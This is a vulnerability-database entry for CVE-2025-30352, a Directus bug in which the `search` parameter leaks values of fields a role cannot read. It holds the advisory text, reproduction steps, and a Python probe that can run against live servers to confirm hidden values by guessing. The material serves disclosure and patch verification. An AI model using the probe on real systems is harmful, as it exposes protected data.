CVE-2025-30352
Published 2025-03-26
Priority: P4 · 30
Severity: Medium, 5.3 (CVSS 3.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
EPSS: 0.34% (26.3rd percentile)
Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0-alpha.4 and prior to version 11.5.0, the `search` query parameter allows users with access to a collection to filter items based on fields they do not have permission to view, which allows the contents of those fields to be enumerated. The `where` clauses generated for the search query are built from every searchable column (numeric and string) without checking those columns against the caller's field permissions, so a request that only needs read access to the collection (the vector is PR:N) can confirm, one guess at a time, values held in fields the caller cannot read. Version 11.5.0 fixes the issue.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| directus | directus | — | — |
| directus | directus | >= 9.0.0-alpha.4 < 11.5.0 | 11.5.0 |
| monospace | directus | — | — |
| monospace | directus | >= 9.0.1 < 11.5.0 | 11.5.0 |
OSV · 2025-03-26
CVE-2025-30352 [MEDIUM] Directus `search` query parameter allows enumeration of non permitted fields
### Summary
The `search` query parameter allows users with access to a collection to filter items based on fields they do not have permission to view. This allows the enumeration of unknown field contents.
### Details
When the search query is applied, the `where` clauses are built from every searchable column (numeric and string) without checking those columns against the requesting role's field permissions. A caller can therefore submit a guessed value in `search` and learn from whether any item is returned that the value is present in a field the caller is not permitted to read.
### PoC
- Create a collection with a string or numeric field, and configure the public role's read permission on the collection so that this field is excluded
- Create items with identifiable content in the excluded field
- Query the collection with the excluded field's content in the `search` param; the matching items are returned even though none of the readable fields contain that value, which confirms the hidden content
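The mechanism in the Details section and the three PoC steps above, worked through as an added example; this is not code from the Directus project or from the advisory. It assumes the standard items endpoint `GET /items/<collection>?search=<term>`; the collection name `documents`, the hidden fields `secret_code` and `score`, and the host `directus.example` are hypothetical. The probe itself never requests the hidden field: it only asks whether a guess matches anything. A constructed in-memory stand-in for the server is included so the example runs offline, with a switch that models the pre-11.5.0 behaviour (search `where` built from every searchable column) beside the fixed behaviour (columns restricted to those the role may read).

```python
"""Probe a Directus collection for CVE-2025-30352 style field enumeration.

Added example for this page, not code from the Directus project or from the
advisory. Assumes the standard items endpoint GET /items/<collection> and a
role whose read permission on the collection omits some fields (here the
hypothetical `secret_code` and `score`). The probe never asks for a hidden
field; it only checks whether `?search=<guess>` returns any item at all.
"""
import json
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List, Optional

Fetch = Callable[[str], bytes]  # full URL in, raw response body out


def search_url(base_url: str, collection: str, term: str) -> str:
    """Build the probe request. `fields=id` keeps the response minimal and
    shows that no readable field needs to contain the guessed value."""
    query = urllib.parse.urlencode({"search": term, "fields": "id", "limit": 1})
    return f"{base_url.rstrip('/')}/items/{urllib.parse.quote(collection)}?{query}"


def http_fetch(url: str, token: Optional[str] = None) -> bytes:
    """Real transport; pass functools.partial(http_fetch, token=...) as `fetch`."""
    req = urllib.request.Request(url)
    if token:
        req.add_header("Authorization", f"Bearer {token}")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def search_hits(body: bytes) -> bool:
    """Non-empty `data` means some item matched the term somewhere,
    including in a column the caller is not allowed to read."""
    return bool(json.loads(body).get("data"))


def enumerate_hidden(fetch: Fetch, base_url: str, collection: str,
                     candidates: Iterable[str]) -> List[str]:
    """Return the guesses the server confirmed. A confirmed guess that appears
    in no readable field was necessarily matched against a hidden one."""
    return [c for c in candidates
            if search_hits(fetch(search_url(base_url, collection, c)))]


class FakeDirectus:
    """Constructed offline stand-in so the example runs without a server.
    Search is modelled as case-insensitive substring match on string columns
    and exact match on numeric columns (an approximation of the real
    behaviour). check_permissions=False mirrors the pre-11.5.0 bug: the
    `where` clause uses every searchable column. True restricts the columns
    to those the role may read, which is what the 11.5.0 fix does."""

    def __init__(self, items, permitted_fields, check_permissions):
        self.items = items
        self.permitted = set(permitted_fields)
        self.check_permissions = check_permissions

    def _matches(self, value, term: str) -> bool:
        if isinstance(value, (int, float)) and not isinstance(value, bool):
            try:
                return float(term) == value
            except ValueError:
                return False
        return isinstance(value, str) and term.lower() in value.lower()

    def fetch(self, url: str) -> bytes:
        params = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
        term = params.get("search", [""])[0]
        matched = []
        for item in self.items:
            columns = [c for c in item
                       if not self.check_permissions or c in self.permitted]
            if any(self._matches(item[c], term) for c in columns):
                # The response itself honours permissions: only `id` is shown.
                matched.append({"id": item["id"]})
        return json.dumps({"data": matched}).encode()


# Constructed sample data: `secret_code` and `score` are the hidden fields.
ITEMS = [
    {"id": 1, "title": "Quarterly report", "secret_code": "ALPHA-7", "score": 42},
    {"id": 2, "title": "Vendor onboarding", "secret_code": "ZETA-9", "score": 17},
]
PUBLIC_FIELDS = {"id", "title"}

if __name__ == "__main__":
    guesses = ["ALPHA-7", "ALPHA-8", "42", "99"]
    base, coll = "https://directus.example", "documents"
    vulnerable = FakeDirectus(ITEMS, PUBLIC_FIELDS, check_permissions=False)
    fixed = FakeDirectus(ITEMS, PUBLIC_FIELDS, check_permissions=True)
    print("pre-11.5.0 confirms:", enumerate_hidden(vulnerable.fetch, base, coll, guesses))
    print("11.5.0 confirms:    ", enumerate_hidden(fixed.fetch, base, coll, guesses))
```

Against a live instance, swap `FakeDirectus(...).fetch` for `http_fetch` (with a token for the role under test, or none for the public role) and point `base` at the server. Note what the oracle is and is not: each request answers one yes/no question about one guessed value, so it confirms or brute-forces low-entropy hidden fields (codes, flags, small integers) rather than dumping them. The same script doubles as the post-upgrade check: after moving to 11.5.0 the hidden-field guesses should no longer be confirmed, while a guess that genuinely appears in a readable field still is.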
GHSA · 2025-03-26
CVE-2025-30352 [MEDIUM] CWE-200 Directus `search` query parameter allows enumeration of non permitted fields
Advisory text identical to the OSV entry above.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
Published: 2025-03-26